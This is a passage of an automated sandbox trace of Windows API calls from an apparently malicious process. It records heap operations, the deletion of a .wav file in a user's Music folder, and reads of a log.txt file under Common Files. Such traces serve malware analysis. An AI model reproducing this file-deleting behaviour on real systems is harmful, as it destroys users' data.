lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.149] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.149] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav", lpFilePart=0x0) returned 0x55 [0184.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0184.150] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\7ihrod3g.wav")) returned 0x20 [0184.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0184.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0184.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0184.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.152] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbda6fa30, ftCreationTime.dwHighDateTime=0x1d5df8c, ftLastAccessTime.dwLowDateTime=0xfe7dc3e0, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0x13007d40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa854, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="7iHROd3G.wav", cAlternateFileName="")) returned 0x90af58 [0184.153] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\7ihrod3g.wav")) returned 1 [0184.155] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbda6fa30, ftCreationTime.dwHighDateTime=0x1d5df8c, ftLastAccessTime.dwLowDateTime=0xfe7dc3e0, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0x13007d40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa854, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="7iHROd3G.wav", cAlternateFileName="")) returned 0 [0184.155] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0184.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.156] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0184.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0184.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0184.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0184.158] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0184.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0184.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0184.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0184.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0184.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0184.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.159] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0184.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0184.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0184.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0184.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0184.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.160] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0184.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0184.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0184.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0184.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0184.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.162] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.162] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.162] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0184.162] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0184.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.163] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.164] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.164] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0184.164] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.164] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0184.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0184.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.165] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0184.165] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2095, lpOverlapped=0x0) returned 1 [0184.166] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0184.166] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x2095, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.166] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0184.169] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.169] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.169] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.169] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.169] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0184.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0184.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0184.170] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0184.170] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.170] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.170] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.170] RtlAllocateHeap 